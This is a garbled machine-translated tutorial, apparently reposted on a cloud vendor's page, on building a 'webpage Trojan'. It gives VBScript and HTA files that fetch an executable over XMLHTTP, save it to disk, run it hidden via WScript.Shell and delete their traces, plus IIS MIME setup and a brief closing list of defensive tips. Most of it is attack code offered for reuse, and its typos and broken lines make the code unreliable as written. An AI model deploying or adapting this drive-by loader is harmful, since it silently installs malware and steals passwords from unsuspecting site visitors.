First, we need to write a few simple files.
I. File named ABC. ABC
<HTML>
<Script language = "VBScript">
Function httpdoget (URL)
Set oreq = Createobject ("Microsoft. XMLHTTP ")
Oreq. Open "get", URL, false
Oreq. Send
If oreq. Status = 200 then
Httpdoget = oreq. respomsebody
SaveFile httpdoget, "C: win.exe"
End if
Set oreq = nothing
End Function
Sub SaveFile (Str. fname)
Set objstream = Createobject ("ADODB. Stream ")
Objstream. type = 1
Objstream. Open
Objstream. Write Str
Objstream. savetofile fname.2
Objstream. Close ()
Set objstream = nothing
Exewin ()
End sub
Sub exewin ()
Set wshshell = Createobject ("wscript. Shell ")
A = wshshell. Run ("cmd.exe/C: win.exe", 0)
B = wshshell. Run ("cmd.exe/C del C: Win. HTA", 0)
Window. Close
End sub
Httpdoget "http: // 127.0.0.1/test.exe"
</SCRIPT>
</Html>
In this example, test.exe is a trojan program. The implementation must be placed in the directory of Web Publishing, And the ABC. ABC file must also be saved in the directory of publishing.
II. File named test.htm
<HTML> <body>
Trojan run test! (This sentence can be changed to what you want to say)
<Object date = "http: // 127.0.0.1/win. Test"; ;;></Object>
</Body>
3. File named win. Test
<HTML>
<Body>
<Script language = "VBScript">
Function httpdoget (URL)
Set oreq = Createobject ("Microsoft. XMLHTTP ")
Oreq. Open "get", URL, false
Oreq. Send
If oreq. Status = 200 then
Httpdoget, "C: Win. HTA"
Set oreq = nothing
End if
End Function
Sub SaveFile (STR, fname)
Dim FSO, TF
S e t f s o = C r e a t e o B j e c t (scripting. FileSystemObject ")
Set TF = FSO. createtextfile (fname, true)
TF. Write Str
TF. Close
Exewin ()
End sub
Sub exewin ()
Set wshshell = Createobject ("wscript. Shell ")
A = wshshell. Run ("cmd.exe/C: Win. Hat", 0)
Window. Close
End sub
Httpdoget ("http: // 127.0.0.1/ABC. ABC ")
</SCRIPT>
</Body>
</Html>
4. The trojan program named test.exe.
...This is just me. If you want to use a Trojan horse, you can replace his name with test.exe.
Server File List
Test.htm: External webpage
Win. test: The ABC. ABC file is stored in the target machine and saved as win. HTA and executed.
Abc.abcdownload the binary Trojan file test.exe and execute it.
Test.exe: Trojan program.
The file mentioned above can be changed to any name, but do not forget to direct the file in the source code to or modify it!
Finally, set IIS, open "program> Administrative Tools> Internet Service Manager", right-click the site to be set, select properties, and select "HTTP header ". Click "file type" in "mime ing" and enter ". "HTA", enter "application/HTA" in the content type (MIME), and close all the windows.
Many of my friends once said that when I gave away Q numbers or played online games, some people shouted to give away Dongdong on the xxx website. In fact, the above example uses this principle, without knowing it, everything on your machine that has a password or a specific term is all sent to the recipient's designated mailbox.
After reading this, do you think this trojan is too dangerous, or even want to unplug the network cable? Well, after learning about how a webpage Trojan works, we can easily defend against it. After reading the above content, we can draw a conclusion that webpage Trojans are mainly implemented using the IE vulnerability, therefore, the following measures must be taken to ensure the security of Internet access,
A. Install the latest version of IE and install the system and IE patches at any time.
B. If you are not familiar with the website sent by your friends, be careful when you are familiar with the website.
C. Do not log on to any pornographic website, or sell some.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
